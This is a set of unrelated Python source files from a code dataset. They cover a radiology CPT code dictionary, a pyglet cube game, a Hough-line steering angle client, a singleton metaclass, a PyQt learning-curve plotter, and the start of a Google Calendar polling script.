'XRAY WRIST 2 VIEWS',\n '73110': 'XRAY WRIST MIN 3 VIEWS',\n '73115': 'XRAY WRIST ARTHROGRAPHY',\n '73120': 'XRAY HAND 2 VIEWS',\n '73130': 'XRAY HAND MIN 3 VIEWS',\n '73140': 'XRAY FINGER 2 VIEWS',\n '73500': 'XRAY XRAY HIP 1 VIEW',\n '73510': 'XRAY HIP MIN TWO VIEWS',\n '73520': 'XRAY HIP BILAT TWO VIEWS',\n '73525': 'XRAY HIP ARTHROGRAPHY',\n '73540': 'X-RAY EXAM OF PELVIS INFANT OR CHILD',\n '73550': 'X-RAY FEMUR TWO VIEWS',\n '73560': 'X-RAY KNEE 1 OR 2 VIEWS',\n '73562': 'X-RAY KNEE-3 VIEWS',\n '73564': 'X-RAY EXAM OF KNEE 4 VIEWS',\n '73565': 'X-RAY KNEE,BILATERAL STANDING',\n '73580': 'X-RAY KNEE 
ARTHROGRAPHY',\n '73590': 'X-RAY TIBIA/FIBULA',\n '73592': 'X-RAY EXAM OF LEG, INFANT',\n '73600': 'X-RAY ANKLE',\n '73610': 'X-RAY ANKLE BILATERAL',\n '73615': 'X-RAY ANKLE ARTHROGRAPHY',\n '73620': 'X-RAY FOOT 2 VIEWS',\n '73630': 'X-RAY FOOT,COMPLETE',\n '73650': 'X-RAY HEEL,TWO VIEWS',\n '73660': 'X-RAY TOE(S)',\n '74000': 'X-RAY ABDOMEN AP VIEW',\n '74010': 'X-RAY EXAM OF ABDOMEN WITH OBLIQUE',\n '74020': 'X-RAY EXAM OF ABDOMEN SUPINE & ERECT',\n '74022': 'X-RAY ABDOMEN COMPLETE WITH AP CHEST',\n '76010': 'X-RAY, NOSE TO RECTUM CHILD',\n '77072': 'X-RAY BONE AGE STUDIES',\n '77073': 'X-RAY BONE LENGTH EVALUATION SCANOGRAM',\n '77074': 'X-RAY BONE SURVEY limited',\n '77075': 'X-RAY BONE SURVEY COMPLETE',\n '77076': 'X-RAY BONE EVALUATION infant',\n '77080': 'X-RAY DEXA/BONE DENSITY STUDY'}\n\n#\n## Useful functions to search 2018 RAD CPT dictionary\n#\n############################################################################\n# Find exact match of a value in a dictionary and return key\n#\ndef find_first_key_exact(input_dict, value):\n return next((k for k, v in input_dict.items() if v== value), None)\n############################################################################\n# Convert a dictionary (keys & value strings) to all lower case characters\n#\ndef lower_dict(d):\n new_dict = dict((k.lower(), v.lower()) for k, v in d.items())\n return new_dict\n############################################################################\n# Convert a dictionary (keys & value strings) to all lower case characters\n#\ndef upper_dict(d):\n new_dict = dict((k.upper(), v.upper()) for k, v in d.items())\n return new_dict\n############################################################################\n# Find value string that contains value and return all possible keys\n# This normalizes the dictionary and value to upper case characters\ndef find_all_keys_containing(input_dict, value):\n upper_case_dict = upper_dict(input_dict)\n return {k for k, v in upper_case_dict.items() if v.find(value.lower()) != -1}\n","sub_path":"sam_2018_cpt_rad.py","file_name":"sam_2018_cpt_rad.py","file_ext":"py","file_size_in_byte":19473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"272718275","text":"#!/usr/bin/python\n#cubes 1.03: fixed ending on level 21\n\n#made by markymarc, m.laugharn+cubes@gmail.com\n\nimport pyglet\nfrom pyglet.window import key\nfrom pyglet import clock\nimport rabbyt\nimport random\n\nwindow = pyglet.window.Window(caption=\"Cubes\")\nclock.schedule(rabbyt.add_time)\n\nnextround = pyglet.resource.media(\"next.wav\", streaming=False) #plays usually after clearSprites()\nwin = pyglet.resource.media(\"win.wav\", streaming=False) #plays when base > 30\noops = pyglet.resource.media(\"oops.wav\", streaming=False)\n\nsize = window.get_size()\nrabbyt.set_viewport(size)\nrabbyt.set_default_attribs()\nlabel = pyglet.text.Label('', font_size = size[0]/80, x=size[0]//2, y=size[1]//4, anchor_x = 'center', anchor_y='center')\n\nsprites = []\nmouse = [0,0,0,0]\ndx = size[0]/2\ndt = 0\nlose = False\nbase = 10\nlevel = pyglet.text.Label(\"Round \" + str(base-9), font_size = size[0]/80, x=size[0]//8, y=size[1]//8, anchor_x = 'center', anchor_y='center')\npaused = pyglet.text.Label(\"Paused\", font_size=size[0]/10, x=size[0]//2, y=size[1]//2, anchor_x = 'center', anchor_y='center')\nshapescale = ((-size[0]/64),size[0]/64,size[0]/64,-size[0]/64)\n\ncolors = [(38/255.0,212/255.0,208/255.0),(194/255.0,0,0)] #teal and dark-ish 
red\n\nwinToggle=False\ninfToggle = False\npauseToggle = False\nvolume = 1.0\nwind = False\nwindValue = 1\n\n@window.event\ndef on_draw():\n global lose\n global mult\n global base\n global dx\n global volume\n global wind\n global windValue\n\n window.clear()\n if lose == False:\n pyglet.clock.schedule_once(update, dt)\n rabbyt.render_unsorted(sprites)\n if sprites ==[]: #put stuff here to make them happen once per round\n if win!= True:\n if volume:nextround.play()\n level.text = \"Round \" + str(base-9)\n base+=1\n dx*=1.05 #ACCELERATE!\n if wind: windValue*=random.choice([-1,1])*1.03\n elif lose == True:\n base = 10\n dx = size[0]/2\n\n if pauseToggle: paused.draw()\n level.draw()\n label.draw()\n\n@window.event\ndef on_mouse_motion(x, y, dx, dy):\n mouse[0]=x\n mouse[1]=y\n\n@window.event\ndef on_key_press(symbol, modifiers):\n global dx\n global lose\n global size\n global shapescale\n global base\n global infToggle\n global winToggle\n global pauseToggle\n global volume\n global wind\n\n if symbol == key.SPACE:\n if lose == True: \n lose = False\n label.text=\"\"\n sprites = []\n level.text = \"Round \" + str(base-9)\n dt = 1\n winToggle = False\n if symbol == key.LEFT:\n dx *=.5\n if symbol == key.RIGHT:\n dx *=2\n if symbol == key.F:\n window.set_fullscreen(fullscreen = not window.fullscreen)\n size = window.get_size()\n shapescale = ((-size[0]/64),size[0]/64,size[0]/64,-size[0]/64)\n level.x, level.y = size[0]//8, size[1]//8\n label.x, label.y = size[0]//2, size[1]//4\n dx = size[1]\n if symbol == key.I:\n infToggle = not infToggle\n if infToggle:\n level.color = (255,0,0,255)\n else:\n level.color = (255,255,255,255)\n if symbol == key.P:\n pauseToggle = not pauseToggle\n if symbol == key.M:\n volume = 1.0 - volume\n if symbol == key.W:\n wind = not wind\n\n@window.event\ndef on_mouse_release(x, y, button, modifiers):\n global dx\n global lose\n global size\n global shapescale\n global base\n global winToggle\n global volume\n\n if button == pyglet.window.mouse.LEFT:\n if lose == True: \n lose = False\n label.text=\"\"\n sprites = []\n level.text = \"Round \" + str(base-9)\n dt = 1\n winToggle = False\n\ndef update(dt):\n global lose\n global sprites\n global base\n global mult\n global shapescale\n global colors\n global oops\n global win\n global winToggle\n global volume\n global wind\n global windValue\n\n if base>29 and infToggle != True: \n dt = 0\n if volume:win.play()\n label.text = \"You win! Do a little dance! 
Then try again.\"\n winToggle = True\n lose = True\n sprites = [] #clear the sprites\n\n if len(sprites) x1 else -math.pi/2\n else:\n angle = math.atan((x2 - x1) / (y2 - y1))\n\n if verbose:\n print(f\"Angle found: {-angle} rad, {-angle*180/math.pi} degrees\")\n\n # Only keep realistic angles\n if abs(180/math.pi * angle) > self.angle_limit:\n return None\n\n return angle\n\n def _angle(self, lines, normalize=True, verbose=False):\n # Angle between -30 and 30 (-1 and 1)\n\n angles = []\n lengths = []\n if verbose:\n print(\"Lines: \", lines)\n\n for line in lines:\n for x1, y1, x2, y2 in line:\n angle = self._line_angle(x1, y1, x2, y2, verbose=verbose)\n if angle:\n angles.append(angle)\n lengths.append(max(abs(x2-x1), abs(y2-y1)))\n\n if not angles:\n if verbose:\n print(\"No valid angles found\")\n return 0\n\n angles = np.array(angles)\n lengths = np.array(lengths)\n\n weighted_mean_angle = np.sum(angles * lengths) / np.sum(lengths)\n\n a = -180/math.pi * np.mean(weighted_mean_angle)\n\n if normalize:\n a = min(30, max(-30, a)) / 30\n\n return a\n\n def _draw_lines(self, img, lines):\n line_image = np.zeros_like(img)\n\n for line in lines:\n for x1,y1,x2,y2 in line:\n color = (255, 0, 0) if self._line_angle(x1, y1, x2, y2) is None else (0, 255, 0)\n cv2.line(line_image,(x1,y1+self.offset),(x2,y2+self.offset),color,5)\n\n dy = 30\n dx = int(dy * math.tan(self._angle(lines)))\n x = img.shape[1] //2\n y = img.shape[0] -1\n\n cv2.arrowedLine(line_image, (x, y), (x+dx, y-dy), (255, 255, 255), 5)\n\n # Draw the lines on the image\n lines_edges = cv2.addWeighted(img, 0.8, line_image, 1, 0)\n\n return lines_edges\n\n def predict_and_draw(self, img):\n lines = self._lines(img)\n if lines is None:\n return self._last_angle\n\n angle = self._angle(lines)\n\n self._last_angle = angle\n\n return angle, self._draw_lines(img, lines)\n\n\nclass HoughClient(AbstractClient):\n def __init__(self, host, rate, **kwargs):\n super(HoughClient, self).__init__(host, rate)\n self.estimator = AngleEstimator(**kwargs)\n\n def process(self, image):\n ang, draw = self.estimator.predict_and_draw(image)\n return ang, self.cv2encode(draw)\n\n\nif __name__ == \"__main__\":\n HoughClient.bootstrap(0.2)\n","sub_path":"clients/hough_client.py","file_name":"hough_client.py","file_ext":"py","file_size_in_byte":4668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"606155022","text":"\"\"\"\r\nCopyright 2021 Daniel Afriyie\r\n\r\nLicensed under the Apache License, Version 2.0 (the \"License\");\r\nyou may not use this file except in compliance with the License.\r\nYou may obtain a copy of the License at\r\n\r\n https://www.apache.org/licenses/LICENSE-2.0\r\n\r\nUnless required by applicable law or agreed to in writing, software\r\ndistributed under the License is distributed on an \"AS IS\" BASIS,\r\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\nSee the License for the specific language governing permissions and\r\nlimitations under the License.\r\n\"\"\"\r\n\r\n\r\nclass SingletonMeta(type):\r\n \"\"\"\r\n Singleton metaclass: restricts the instantiation of a class to one object\r\n \"\"\"\r\n __instances = {}\r\n\r\n def __call__(cls, *args, **kwargs):\r\n if cls not in cls.__instances:\r\n cls.__instances[cls] = super().__call__(*args, **kwargs)\r\n return 
cls.__instances[cls]\r\n","sub_path":"raccy/core/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"10705809","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: C:\\Users\\HDi\\Google Drive\\ProgramCodes\\PythonCodes\\cognitivegeo\\src\\gui\\plotmllearncurve.py\n# Compiled at: 2020-03-17 16:23:40\n# Size of source mod 2**32: 22583 bytes\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nimport os, sys, numpy as np, matplotlib.pyplot as plt\nsys.path.append(os.path.dirname(__file__)[:-4][:-4][:-13])\nfrom cognitivegeo.src.basic.data import data as basic_data\nfrom cognitivegeo.src.core.settings import settings as core_set\nfrom cognitivegeo.src.vis.font import font as vis_font\nfrom cognitivegeo.src.gui.configlineplotting import configlineplotting as gui_configlineplotting\nfrom cognitivegeo.src.vis.messager import messager as vis_msg\nQtWidgets.QApplication.setAttribute(QtCore.Qt.AA_EnableHighDpiScaling, True)\nQtWidgets.QApplication.setAttribute(QtCore.Qt.AA_UseHighDpiPixmaps, True)\n\nclass plotmllearncurve(object):\n learnmat = []\n linestyle = core_set.Visual['Line']\n fontstyle = core_set.Visual['Font']\n iconpath = os.path.dirname(__file__)\n dialog = None\n lineplottingconfig = {}\n\n def setupGUI(self, PlotMlLearnCurve):\n PlotMlLearnCurve.setObjectName('PlotMlLearnCurve')\n PlotMlLearnCurve.setFixedSize(420, 270)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(os.path.join(self.iconpath, 'icons/plotcurve.png')), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n PlotMlLearnCurve.setWindowIcon(icon)\n self.lblselect = QtWidgets.QLabel(PlotMlLearnCurve)\n self.lblselect.setObjectName('lblselect')\n self.lblselect.setGeometry(QtCore.QRect(10, 10, 60, 30))\n self.lblprocess = QtWidgets.QLabel(PlotMlLearnCurve)\n self.lblprocess.setObjectName('lblprocess')\n self.lblprocess.setGeometry(QtCore.QRect(10, 50, 60, 30))\n self.cbbprocess = QtWidgets.QComboBox(PlotMlLearnCurve)\n self.cbbprocess.setObjectName('cbbprocess')\n self.cbbprocess.setGeometry(QtCore.QRect(70, 50, 100, 30))\n self.lblcurve = QtWidgets.QLabel(PlotMlLearnCurve)\n self.lblcurve.setObjectName('lblcurve')\n self.lblcurve.setGeometry(QtCore.QRect(10, 90, 60, 30))\n self.cbbcurve = QtWidgets.QComboBox(PlotMlLearnCurve)\n self.cbbcurve.setObjectName('cbbcurve')\n self.cbbcurve.setGeometry(QtCore.QRect(70, 90, 100, 30))\n self.btnconfigline = QtWidgets.QPushButton(PlotMlLearnCurve)\n self.btnconfigline.setObjectName('btnconfigline')\n self.btnconfigline.setGeometry(QtCore.QRect(270, 10, 120, 30))\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(os.path.join(self.iconpath, 'icons/settings.png')), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.btnconfigline.setIcon(icon)\n self.lblepoch = QtWidgets.QLabel(PlotMlLearnCurve)\n self.lblepoch.setObjectName('lblepoch')\n self.lblepoch.setGeometry(QtCore.QRect(210, 50, 60, 30))\n self.ldtepochmin = QtWidgets.QLineEdit(PlotMlLearnCurve)\n self.ldtepochmin.setObjectName('ldtepochmin')\n self.ldtepochmin.setGeometry(QtCore.QRect(270, 50, 50, 30))\n self.ldtepochmin.setAlignment(QtCore.Qt.AlignCenter)\n self.ldtepochmax = QtWidgets.QLineEdit(PlotMlLearnCurve)\n self.ldtepochmax.setObjectName('ldtepochmax')\n self.ldtepochmax.setGeometry(QtCore.QRect(340, 50, 50, 30))\n self.ldtepochmax.setAlignment(QtCore.Qt.AlignCenter)\n self.lblepochrangeto = 
QtWidgets.QLabel(PlotMlLearnCurve)\n self.lblepochrangeto.setObjectName('lblepochrangeto')\n self.lblepochrangeto.setGeometry(QtCore.QRect(320, 50, 20, 30))\n self.lblepochrangeto.setAlignment(QtCore.Qt.AlignCenter)\n self.lblaccuracy = QtWidgets.QLabel(PlotMlLearnCurve)\n self.lblaccuracy.setObjectName('lblaccuracy')\n self.lblaccuracy.setGeometry(QtCore.QRect(210, 90, 60, 30))\n self.ldtaccuracymin = QtWidgets.QLineEdit(PlotMlLearnCurve)\n self.ldtaccuracymin.setObjectName('ldtaccuracymin')\n self.ldtaccuracymin.setGeometry(QtCore.QRect(270, 90, 50, 30))\n self.ldtaccuracymin.setAlignment(QtCore.Qt.AlignCenter)\n self.ldtaccuracymax = QtWidgets.QLineEdit(PlotMlLearnCurve)\n self.ldtaccuracymax.setObjectName('ldtaccuracymax')\n self.ldtaccuracymax.setGeometry(QtCore.QRect(340, 90, 50, 30))\n self.ldtaccuracymax.setAlignment(QtCore.Qt.AlignCenter)\n self.lblaccuracyrangeto = QtWidgets.QLabel(PlotMlLearnCurve)\n self.lblaccuracyrangeto.setObjectName('lblaccuracyrangeto')\n self.lblaccuracyrangeto.setGeometry(QtCore.QRect(320, 90, 20, 30))\n self.lblaccuracyrangeto.setAlignment(QtCore.Qt.AlignCenter)\n self.lblloss = QtWidgets.QLabel(PlotMlLearnCurve)\n self.lblloss.setObjectName('lblloss')\n self.lblloss.setGeometry(QtCore.QRect(210, 130, 60, 30))\n self.ldtlossmin = QtWidgets.QLineEdit(PlotMlLearnCurve)\n self.ldtlossmin.setObjectName('ldtlossmin')\n self.ldtlossmin.setGeometry(QtCore.QRect(270, 130, 50, 30))\n self.ldtlossmin.setAlignment(QtCore.Qt.AlignCenter)\n self.ldtlossmax = QtWidgets.QLineEdit(PlotMlLearnCurve)\n self.ldtlossmax.setObjectName('ldtlossmax')\n self.ldtlossmax.setGeometry(QtCore.QRect(340, 130, 50, 30))\n self.ldtlossmax.setAlignment(QtCore.Qt.AlignCenter)\n self.lbllossrangeto = QtWidgets.QLabel(PlotMlLearnCurve)\n self.lbllossrangeto.setObjectName('lbllossrangeto')\n self.lbllossrangeto.setGeometry(QtCore.QRect(320, 130, 20, 30))\n self.lbllossrangeto.setAlignment(QtCore.Qt.AlignCenter)\n self.lbllegend = QtWidgets.QLabel(PlotMlLearnCurve)\n self.lbllegend.setObjectName('lbllegend')\n self.lbllegend.setGeometry(QtCore.QRect(210, 170, 60, 30))\n self.cbblegend = QtWidgets.QComboBox(PlotMlLearnCurve)\n self.cbblegend.setObjectName('cbblegend')\n self.cbblegend.setGeometry(QtCore.QRect(270, 170, 120, 30))\n self.btnapply = QtWidgets.QPushButton(PlotMlLearnCurve)\n self.btnapply.setObjectName('btnapply')\n self.btnapply.setGeometry(QtCore.QRect(130, 220, 160, 30))\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(os.path.join(self.iconpath, 'icons/ok.png')), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.btnapply.setIcon(icon)\n self.msgbox = QtWidgets.QMessageBox(PlotMlLearnCurve)\n self.msgbox.setObjectName('msgbox')\n _center_x = PlotMlLearnCurve.geometry().center().x()\n _center_y = PlotMlLearnCurve.geometry().center().y()\n self.msgbox.setGeometry(QtCore.QRect(_center_x - 150, _center_y - 50, 300, 100))\n self.retranslateGUI(PlotMlLearnCurve)\n QtCore.QMetaObject.connectSlotsByName(PlotMlLearnCurve)\n\n def retranslateGUI(self, PlotMlLearnCurve):\n self.dialog = PlotMlLearnCurve\n _translate = QtCore.QCoreApplication.translate\n PlotMlLearnCurve.setWindowTitle(_translate('PlotMlLearnCurve', 'Plot Learning Curve'))\n self.lblselect.setText(_translate('PlotMlLearnCurve', 'Select:'))\n self.lblprocess.setText(_translate('PlotMlLearnCurve', 'Process:'))\n self.cbbprocess.addItems(['Training', 'Validation', 'Both'])\n self.cbbprocess.currentIndexChanged.connect(self.changeCbbProcessCurve)\n self.lblcurve.setText(_translate('PlotMlLearnCurve', 'Curve:'))\n 
self.cbbcurve.addItems(['Accuracy', 'Loss', 'Both'])\n self.cbbcurve.currentIndexChanged.connect(self.changeCbbProcessCurve)\n self.btnconfigline.setText(_translate('PlotMlLearnCurve', 'Configuration'))\n self.btnconfigline.clicked.connect(self.clickBtnConfigLine)\n self.lblepoch.setText(_translate('PlotMlLearnCurve', 'Epoch:'))\n self.lblepochrangeto.setText(_translate('PlotMlLearnCurve', '~~'))\n self.lblaccuracy.setText(_translate('PlotMlLearnCurve', 'Accuracy:'))\n self.lblaccuracyrangeto.setText(_translate('PlotMlLearnCurve', '~~'))\n self.lblloss.setText(_translate('PlotMlLearnCurve', 'Loss:'))\n self.lbllossrangeto.setText(_translate('PlotMlLearnCurve', '~~'))\n self.lbllegend.setText(_translate('PlotMlLearnCurve', 'Legend:'))\n self.cbblegend.addItems(['On', 'Off'])\n self.btnapply.setText(_translate('PlotMlLearnCurve', 'Apply'))\n self.btnapply.setDefault(True)\n self.btnapply.clicked.connect(self.clickBtnApply)\n self.lineplottingconfig['Training accuracy'] = core_set.Visual['Line']\n if np.ndim(self.learnmat) >= 2:\n if np.shape(self.learnmat)[1] >= 5:\n self.ldtepochmin.setText(_translate('PlotMlLearnCurve', str(np.min(self.learnmat[:, 0]))))\n self.ldtepochmax.setText(_translate('PlotMlLearnCurve', str(np.max(self.learnmat[:, 0]))))\n self.ldtaccuracymin.setText(_translate('PlotMlLearnCurve', str(np.min(self.learnmat[:, 1:3]))))\n self.ldtaccuracymax.setText(_translate('PlotMlLearnCurve', str(np.max(self.learnmat[:, 1:3]))))\n self.ldtlossmin.setText(_translate('PlotMlLearnCurve', str(np.min(self.learnmat[:, 3:5]))))\n self.ldtlossmax.setText(_translate('PlotMlLearnCurve', str(np.max(self.learnmat[:, 3:5]))))\n\n def changeCbbProcessCurve(self):\n _curvelist = []\n if self.cbbprocess.currentIndex() == 0:\n _curvelist = [\n 'Training']\n if self.cbbprocess.currentIndex() == 1:\n _curvelist = [\n 'Validation']\n if self.cbbprocess.currentIndex() == 2:\n _curvelist = [\n 'Training', 'Validation']\n if self.cbbcurve.currentIndex() == 0:\n _curvelist = [_curve + ' accuracy' for _curve in _curvelist]\n if self.cbbcurve.currentIndex() == 1:\n _curvelist = [_curve + ' loss' for _curve in _curvelist]\n if self.cbbcurve.currentIndex() == 2:\n _curvelist = [_curve + ' accuracy' for _curve in _curvelist] + [_curve + ' loss' for _curve in _curvelist]\n _config = {}\n for _curve in _curvelist:\n if _curve in self.lineplottingconfig.keys():\n _config[_curve] = self.lineplottingconfig[_curve]\n else:\n _config[_curve] = core_set.Visual['Line']\n\n self.lineplottingconfig = _config\n\n def clickBtnConfigLine(self):\n _config = QtWidgets.QDialog()\n _gui = gui_configlineplotting()\n _gui.lineplottingconfig = self.lineplottingconfig\n _gui.setupGUI(_config)\n _config.exec()\n self.lineplottingconfig = _gui.lineplottingconfig\n _config.show()\n\n def clickBtnApply(self):\n self.refreshMsgBox()\n if np.ndim(self.learnmat) < 2 or np.shape(self.learnmat)[1] < 5:\n vis_msg.print('ERROR in PlotMlLearnCurve: Wrong learning matrix', type='error')\n QtWidgets.QMessageBox.critical(self.msgbox, 'Plot Learning Curve', 'Wrong learning matrix')\n return\n if self.cbbprocess.currentIndex() == 0:\n processtype = 1\n if self.cbbprocess.currentIndex() == 1:\n processtype = -1\n if self.cbbprocess.currentIndex() == 2:\n processtype = 0\n if self.cbbcurve.currentIndex() == 0:\n curvetype = 1\n if self.cbbcurve.currentIndex() == 1:\n curvetype = -1\n if self.cbbcurve.currentIndex() == 2:\n curvetype = 0\n epochmin = basic_data.str2float(self.ldtepochmin.text())\n epochmax = 
basic_data.str2float(self.ldtepochmax.text())\n if epochmin is False or epochmax is False:\n print('PlotMlLearnCurve: Non-float epoch range')\n QtWidgets.QMessageBox.critical(self.msgbox, 'Plot Learning Curve', 'Non-float epoch range')\n return\n accuracymin = basic_data.str2float(self.ldtaccuracymin.text())\n accuracymax = basic_data.str2float(self.ldtaccuracymax.text())\n if curvetype >= 0:\n if accuracymin is False or accuracymax is False:\n print('PlotMlLearnCurve: Non-float accuracy range')\n QtWidgets.QMessageBox.critical(self.msgbox, 'Plot Learning Curve', 'Non-float accuracy range')\n return\n lossmin = basic_data.str2float(self.ldtlossmin.text())\n lossmax = basic_data.str2float(self.ldtlossmax.text())\n if curvetype <= 0:\n if lossmin is False or lossmax is False:\n print('PlotMlLearnCurve: Non-float loss range')\n QtWidgets.QMessageBox.critical(self.msgbox, 'Plot Learning Curve', 'Non-float loss range')\n return\n if self.cbblegend.currentIndex() == 0:\n legendon = True\n if self.cbblegend.currentIndex() == 1:\n legendon = False\n self.plotLearningCurve(processtype=processtype, curvetype=curvetype, epochlim=[\n epochmin, epochmax],\n accuracylim=[\n accuracymin, accuracymax],\n losslim=[\n lossmin, lossmax],\n fontstyle=(self.fontstyle),\n legendon=legendon)\n\n def refreshMsgBox(self):\n _center_x = self.dialog.geometry().center().x()\n _center_y = self.dialog.geometry().center().y()\n self.msgbox.setGeometry(QtCore.QRect(_center_x - 150, _center_y - 50, 300, 100))\n\n def plotLearningCurve(self, processtype=0, curvetype=0, epochlim=[\n 0, 10], accuracylim=[\n 0, 1.0], losslim=[\n 0, 10], fontstyle=None, legendon=True):\n vis_font.updatePltFont(fontstyle)\n fig, ax1 = plt.subplots()\n fig.patch.set_facecolor('white')\n ax1.set_xlabel('Epochs')\n ax1.set_xlim([min(self.learnmat[:, 0]), max(self.learnmat[:, 0])])\n if curvetype >= 0:\n ax1.set_ylabel('Accuracy')\n else:\n ax1.set_ylabel('Loss')\n if curvetype == 0:\n ax2 = ax1.twinx()\n ax2.set_ylabel('Loss')\n if processtype >= 0:\n if curvetype >= 0:\n k_line, = ax1.plot((self.learnmat[:, 0]), (self.learnmat[:, 1]), color=(self.lineplottingconfig['Training accuracy']['Color'].lower()),\n linewidth=(self.lineplottingconfig['Training accuracy']['Width']),\n linestyle=(self.lineplottingconfig['Training accuracy']['Style'].lower()),\n marker=(self.lineplottingconfig['Training accuracy']['MarkerStyle']),\n markersize=(self.lineplottingconfig['Training accuracy']['MarkerSize']),\n label='Training accuracy')\n ax1.set_xlim(epochlim)\n ax1.set_ylim(accuracylim)\n else:\n b_line, = ax1.plot((self.learnmat[:, 0]), (self.learnmat[:, 3]), color=(self.lineplottingconfig['Training loss']['Color'].lower()),\n linewidth=(self.lineplottingconfig['Training loss']['Width']),\n linestyle=(self.lineplottingconfig['Training loss']['Style'].lower()),\n marker=(self.lineplottingconfig['Training loss']['MarkerStyle']),\n markersize=(self.lineplottingconfig['Training loss']['MarkerSize']),\n label='Training loss')\n ax1.set_xlim(epochlim)\n ax1.set_ylim(losslim)\n if curvetype == 0:\n b_line, = ax2.plot((self.learnmat[:, 0]), (self.learnmat[:, 3]), color=(self.lineplottingconfig['Training loss']['Color'].lower()),\n linewidth=(self.lineplottingconfig['Training loss']['Width']),\n linestyle=(self.lineplottingconfig['Training loss']['Style'].lower()),\n marker=(self.lineplottingconfig['Training loss']['MarkerStyle']),\n markersize=(self.lineplottingconfig['Training loss']['MarkerSize']),\n label='Training loss')\n ax2.set_xlim(epochlim)\n 
ax2.set_ylim(losslim)\n if processtype <= 0:\n if curvetype >= 0:\n r_line, = ax1.plot((self.learnmat[:, 0]), (self.learnmat[:, 2]), color=(self.lineplottingconfig['Validation accuracy']['Color'].lower()),\n linewidth=(self.lineplottingconfig['Validation accuracy']['Width']),\n linestyle=(self.lineplottingconfig['Validation accuracy']['Style'].lower()),\n marker=(self.lineplottingconfig['Validation accuracy']['MarkerStyle']),\n markersize=(self.lineplottingconfig['Validation accuracy']['MarkerSize']),\n label='Validation accuracy')\n ax1.set_xlim(epochlim)\n ax1.set_ylim(accuracylim)\n else:\n g_line, = ax1.plot((self.learnmat[:, 0]), (self.learnmat[:, 4]), color=(self.lineplottingconfig['Validation loss']['Color'].lower()),\n linewidth=(self.lineplottingconfig['Validation loss']['Width']),\n linestyle=(self.lineplottingconfig['Validation loss']['Style'].lower()),\n marker=(self.lineplottingconfig['Validation loss']['MarkerStyle']),\n markersize=(self.lineplottingconfig['Validation loss']['MarkerSize']),\n label='Validation loss')\n ax1.set_xlim(epochlim)\n ax1.set_ylim(losslim)\n if curvetype == 0:\n g_line, = ax2.plot((self.learnmat[:, 0]), (self.learnmat[:, 4]), color=(self.lineplottingconfig['Validation loss']['Color'].lower()),\n linewidth=(self.lineplottingconfig['Validation loss']['Width']),\n linestyle=(self.lineplottingconfig['Validation loss']['Style'].lower()),\n marker=(self.lineplottingconfig['Validation loss']['MarkerStyle']),\n markersize=(self.lineplottingconfig['Validation loss']['MarkerSize']),\n label='Validation loss')\n ax2.set_xlim(epochlim)\n ax2.set_ylim(losslim)\n if legendon:\n if processtype == 0:\n if curvetype == 0:\n plt.legend([k_line, r_line, b_line, g_line], [\n 'Training accuracy', 'Validation accuracy', 'Training loss', 'Validation loss'],\n loc='center right')\n if curvetype > 0:\n plt.legend([k_line, r_line], [\n 'Training accuracy', 'Validation accuracy'],\n loc='center right')\n if curvetype < 0:\n plt.legend([b_line, g_line], [\n 'Training loss', 'Validation loss'],\n loc='center right')\n if legendon:\n if processtype > 0:\n if curvetype == 0:\n plt.legend([k_line, b_line], ['Training accuracy', 'Training loss'])\n if curvetype > 0:\n plt.legend([k_line], ['Training accuracy'])\n if curvetype < 0:\n plt.legend([b_line], ['Training loss'])\n if legendon:\n if processtype < 0:\n if curvetype == 0:\n plt.legend([r_line, g_line], ['Validation accuracy', 'Validation loss'])\n if curvetype > 0:\n plt.legend([r_line], ['Validation accuracy'])\n if curvetype < 0:\n plt.legend([g_line], ['Validation loss'])\n fig.canvas.set_window_title('ML Learning Curve')\n plt.show()\n\n\nif __name__ == '__main__':\n import sys\n app = QtWidgets.QApplication(sys.argv)\n PlotMlLearnCurve = QtWidgets.QWidget()\n gui = plotmllearncurve()\n gui.setupGUI(PlotMlLearnCurve)\n PlotMlLearnCurve.show()\n sys.exit(app.exec_())","sub_path":"pycfiles/gaeio-1.0.tar/plotmllearncurve.cpython-36.py","file_name":"plotmllearncurve.cpython-36.py","file_ext":"py","file_size_in_byte":19594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"343596214","text":"from __future__ import print_function\nimport datetime\nimport pickle\nimport os.path\nfrom googleapiclient.discovery import build\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\nimport requests\nimport time\n\nactuator_url=\"http://192.168.1.100:3030\"\nmeeting_room=actuator_url+\"/meeting\"\n\n# If modifying these scopes, 
delete the file token.pickle.\nSCOPES = ['https://www.googleapis.com/auth/calendar.readonly']\n\ndef main():\n \"\"\"Shows basic usage of the Google Calendar API.\n Prints the start and name of the next 10 events on the user's calendar.\n \"\"\"\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n 'credentials.json', SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n\n service = build('calendar', 'v3', credentials=creds)\n eventName=\" \"\n while True:\n\n # Call the Calendar API\n now = datetime.datetime.utcnow().isoformat() + 'Z' # 'Z' indicates UTC time\n print('Getting the upcoming 10 events')\n events_result = 